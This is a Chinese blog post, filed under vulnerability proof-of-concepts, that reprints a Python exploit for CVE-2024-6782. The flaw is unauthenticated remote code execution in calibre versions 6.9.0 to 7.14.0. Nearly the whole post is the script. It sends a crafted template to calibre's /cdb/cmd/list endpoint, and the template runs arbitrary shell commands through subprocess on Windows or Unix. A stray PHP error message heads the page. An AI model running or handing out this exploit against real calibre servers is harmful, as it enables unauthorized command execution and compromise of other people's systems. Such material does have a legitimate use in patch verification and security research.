Warning: Undefined array key "HTTP_ACCEPT_LANGUAGE" in /www/wwwroot/blog.guapiwo.top/usr/themes/joe/public/tencent_protect.php on line 40

Deprecated: strpos(): Passing null to parameter #1 ($haystack) of type string is deprecated in /www/wwwroot/blog.guapiwo.top/usr/themes/joe/public/tencent_protect.php on line 40
Calibre远程代码执行漏洞(CVE-2024-6782) - 瓜皮博客_d0glun

Calibre远程代码执行漏洞(CVE-2024-6782)

d0glun

累计撰写 25 篇文章
累计收到 2 条评论

Calibre远程代码执行漏洞(CVE-2024-6782)

瓜皮博客_d0glun

首页
/
漏洞POC
/
正文

漏洞POC

Calibre远程代码执行漏洞(CVE-2024-6782)

d0glun

2025-05-20 / 0 评论 / 2 阅读 / 正在检测是否收录...

05/20

#! /usr/bin/env python3
# PoC for: CVE-2024-6782
# Description: Unauthenticated remote code execution in 6.9.0 <= calibre <= 7.14.0
import json
import sys

import requests

_target = "http://localhost:8080"

def exploit(cmd):
    r = requests.post(
        f"{_target}/cdb/cmd/list",
        headers={"Content-Type": "application/json"},
        json=[
            ["template"],
            "", # sortby: leave empty
            "", # ascending: leave empty
            "", # search_text: leave empty, set to all
            1, # limit results
            f"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode()\n except Exception:\n return subprocess.check_output(['sh', '-c', '{cmd}']).decode()", # payload
        ],
    )

    try:
        print(list(r.json()["result"]["data"]["template"].values())[0])
    except Exception as e:
        print(r.text)

if __name__ == "__main__":
    exploit("whami")

暂无标签

收藏本站，优质文章不错过

blog.guapiwo.top

版权属于： d0glun

本文链接： https://blog.guapiwo.top/index.php/archives/19/

作品采用：《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 》许可协议授权

Calibre远程代码执行漏洞(CVE-2024-6782)

评论 (0)